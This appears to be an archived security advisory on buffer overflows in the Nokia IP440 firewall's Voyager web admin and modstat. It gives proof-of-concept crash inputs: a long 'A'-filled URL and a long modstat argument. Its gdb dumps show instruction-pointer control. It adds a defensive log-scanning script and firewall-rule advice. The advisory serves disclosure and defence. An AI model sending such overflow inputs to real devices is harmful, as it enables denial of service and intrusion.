COMMAND

    Nokia firewalls

SYSTEMS AFFECTED

    Nokia firewalls

PROBLEM

    'K2' found the following.  He unwrapped his shiny new Nokia IP440
    integrated Firewall-1/IDS appliance and thought to give it a once
    over.  It appears to be an older FreeBSD kernel + some firewall
    (Checkpoint 4.1) + some IDS (ISS) + remote admin (SSH/http).

    These vulnerabilities all require an authenticated user; however, it
    is still amazing that a device with security as its primary function
    would have so many issues.

    A request to its default http administration site...

        http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main

    will result in "Html_gen exited because of signal: Segmentation
    fault".  After this, any attempt to connect to the site will
    return "Error while getting page: Couldn't connect to /tmp/xsets:
    No such file or directory".

    /bin/xpand will die, dumping core in /var/tmp...

        scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        Modified in 1997, 1998 by Nokia IP Inc.
        There is absolutely no warranty for GDB; type "show warranty" for
        details.
        GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
        Foundation, Inc.
        Core was generated by `xpand'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x10046fb6 in ??
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        (gdb) file xpand-11.27.2000-094458
        Reading symbols from xpand-11.27.2000-094458...done.
        (gdb) bt
        #0  0x10046fb6 in end
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        #1  0xefbfd3b8 in end
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        #2  0x10047110 in end
            (7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
        #3  0x10044233 in end
            (7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
        #4  0x100446df in end
            (5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
        efbfd444)
        #5  0x1004416c in end
            (3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
        #6  0x1004732e in end
            (321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
        10044713)
        #7  0x100441ac in end
            (332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
        #8  0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
        #9  0x21983 in handle_template_request (d=0x34000,
            request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
            request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
        xcommit.c:1053
        #10 0x22d6a in stream_set (
            fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
        xpand.c:179
        #11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
        #12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
        ---Type <return> to continue, or q <return> to quit---
        #13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
        1)
            at xpand.c:385
        (gdb) info reg
        eax            0x41414141       1094795585
        ecx            0x41414141       1094795585
        edx            0x0      0
        ebx            0x1004f060       268759136
        esp            0xefbfd394       0xefbfd394
        ebp            0xefbfd394       0xefbfd394
        esi            0x7d380  512896
        edi            0x41414141       1094795585
        eip            0x10046fb6       0x10046fb6
        ps             0x10206  66054
        cs             0x1f     31
        ss             0x27     39
        ds             0xefbf0027       -272695257
        es             0x80027  524327
        (gdb)

    also....

        scrooge:/var/tmp# gdb -c html_gen.core
        (gdb) info reg
        eax            0x88dc   35036
        ecx            0xfffffffc       -4
        edx            0x4949   18761
        ebx            0x1009b060       269070432
        esp            0xefbfaa74       0xefbfaa74
        ebp            0xefbfaa84       0xefbfaa84
        esi            0x0      0
        edi            0x41414141       1094795585
        eip            0x10084d1b       0x10084d1b
        ps             0x10216  66070
        cs             0x1f     31
        ss             0x27     39
        ds             0x27     39
        es             0x27     39
        (gdb)

    also,

        scrooge:/var/tmp# ./modstat -n
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        Type     Id Off Loadaddr Size Info     Rev Module Name
        modstat: LMSTAT: Bad file descriptor
        Segmentation fault (core dumped)
        (gdb) info reg
        eax            0x4      4
        ecx            0xefbfcfb8       -272642120
        edx            0xefbfcfb8       -272642120
        ebx            0x0      0
        esp            0xefbfd354       0xefbfd354
        ebp            0x41414141       0x41414141
        esi            0xffffffff       -1
        edi            0x3      3
        eip            0x41414141       0x41414141

    This  was  tested   with  IPSO  scrooge   3.2.1-fcs1  releng   849
    11.24.1999-102644 i386 FW-1, 4.1 SP2.
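    A defender watching the web tier can spot this class of request before it reaches html_gen.  The following is an added Python example (not part of the advisory) that scans constructed Common Log Format lines for requests to the Voyager html_page CGI whose longest query-string token exceeds a cap; the 1024-byte cap and the log layout are assumptions.

```python
import re
from urllib.parse import urlsplit

# Common Log Format: host ident user [time] "request" status bytes (assumed layout)
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

VOYAGER_CGI = "/cgi-bin/html_page"
MAX_TOKEN_LEN = 1024   # assumed cap; the crashing request carried ~6000 bytes


def parse_line(line):
    """Split one access-log line into host, user, method and URL (None if malformed)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, user, _ts, request, _status, _size = m.groups()
    fields = request.split(" ")
    if len(fields) < 2:
        return None
    return {"host": host, "user": user, "method": fields[0], "url": fields[1]}


def check_request(url):
    """Return a finding for an oversized html_page query token, else None."""
    parts = urlsplit(url)
    if parts.path != VOYAGER_CGI:
        return None
    # the crash came from one huge unnamed token, so measure each &-separated token
    longest = max((len(tok) for tok in parts.query.split("&")), default=0)
    if longest > MAX_TOKEN_LEN:
        return f"{longest}-byte query token to {VOYAGER_CGI} (cap {MAX_TOKEN_LEN})"
    return None


def scan(lines):
    """Return (host, user, reason) for every suspicious request in the log lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        reason = check_request(rec["url"]) if rec else None
        if reason:
            findings.append((rec["host"], rec["user"], reason))
    return findings


# constructed sample: one normal Voyager page load and one oversized request
SAMPLE_LOG = [
    '10.1.1.3 - admin [27/Nov/2000:09:44:50 -0500] '
    '"GET /cgi-bin/html_page?TEMPLATE=main HTTP/1.0" 200 4120',
    '192.0.2.10 - admin [27/Nov/2000:09:44:58 -0500] '
    '"GET /cgi-bin/html_page?' + "A" * 6000 + '&TEMPLATE=main HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for host, user, reason in scan(SAMPLE_LOG):
        print(f"{host} ({user}): {reason}")
```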

SOLUTION

    Nokia is aware of this issue.  This is a bug; yes, it will be fixed
    very quickly, but this is not a major vulnerability: you do need a
    logon to the box.  If this logon was obtained through covert
    measures then you have bigger problems than this bug!

    Recommendations:

        1. Do not allow Voyager access from untrusted networks (e.g.
           the Internet).
        2. Use good generally accepted practice regarding password
           selection and confidentiality (as always).
        3. Consider disabling monitor (read-only administrator) access.
        4. Use the provided SSH with port redirection (IPSO 3.2.1 and
           earlier) or embedded SSL (IPSO 3.3 and later) to encrypt
           http traffic to Voyager to prevent an attacker from
           eavesdropping to hear the password.

    A good FireWall-1 rule set to implement recommendations 1-4  might
    look something like:

        Source / Dest / Service / Action
        --------------------------------------------------------------
        admin-group / firewalls / [http,] ssh / Accept
        management-console / firewalls / fw1-group / Accept
        Any / firewalls / Any / Drop

    The first rule permits administrative access.  The second provides
    FireWall-1  management  access  for  the  machine  acting  as  the
    management  console  (and  is  only  referenced if Properties have
    been   modified   to   no   longer   accept   FireWall-1   Control
    Connections).  The  third excludes all  other traffic directly  to
    the firewalls, and is referred  to by Check Point as  the "stealth
    rule".
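    A first-match simulation of that rule set, added here as a Python example (not Check Point code); the group addresses and the fw1-group port list are assumptions.  It also flags the ordering mistake of placing the stealth rule above the admin Accept rule, which would lock administrators out rather than protect Voyager.

```python
from ipaddress import ip_address, ip_network

# Object groups (addresses are assumed for the demonstration)
GROUPS = {
    "admin-group":        [ip_network("10.1.1.0/28")],
    "management-console": [ip_network("10.1.2.5/32")],
    "firewalls":          [ip_network("10.1.0.1/32"), ip_network("10.1.0.2/32")],
}
# Service objects as TCP ports; the fw1-group port list is assumed
SERVICES = {"http": {80}, "ssh": {22}, "fw1-group": {256, 257, 258}}

# The advisory's rule set, in order: (source, dest, services, action)
STEALTH_RULE = ("Any", "firewalls", ("Any",), "Drop")
POLICY = [
    ("admin-group",        "firewalls", ("http", "ssh"), "Accept"),
    ("management-console", "firewalls", ("fw1-group",),  "Accept"),
    STEALTH_RULE,
]


def in_group(addr, name):
    return name == "Any" or any(ip_address(addr) in net for net in GROUPS[name])


def in_service(port, names):
    return "Any" in names or any(port in SERVICES[n] for n in names)


def evaluate(src, dst, port, policy=POLICY):
    """First-match evaluation; anything no rule matches is dropped, as FW-1 does."""
    for idx, (s, d, svc, action) in enumerate(policy):
        if in_group(src, s) and in_group(dst, d) and in_service(port, svc):
            return action, idx
    return "Drop", None


def stealth_rule_shadows_admin(policy=POLICY):
    """True if the stealth rule sits above an Accept rule aimed at the firewalls,
    i.e. the admin rule can never match and administrators are locked out."""
    if STEALTH_RULE not in policy:
        return False
    stealth_at = policy.index(STEALTH_RULE)
    return any(r[1] == "firewalls" and r[3] == "Accept" for r in policy[stealth_at + 1:])


if __name__ == "__main__":
    print(evaluate("10.1.1.3", "10.1.0.1", 22))      # admin ssh: Accept by rule 0
    print(evaluate("203.0.113.9", "10.1.0.1", 80))   # outsider http: Drop by rule 2
    print(stealth_rule_shadows_admin([STEALTH_RULE] + POLICY[:2]))  # True
```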

    With these appropriate rules,  an attacker must meet  the criteria
    established in your  FireWall-1 security policy  and then also  be
    authenticated as an administrator before he can attempt to  attack
    the Voyager-related processes.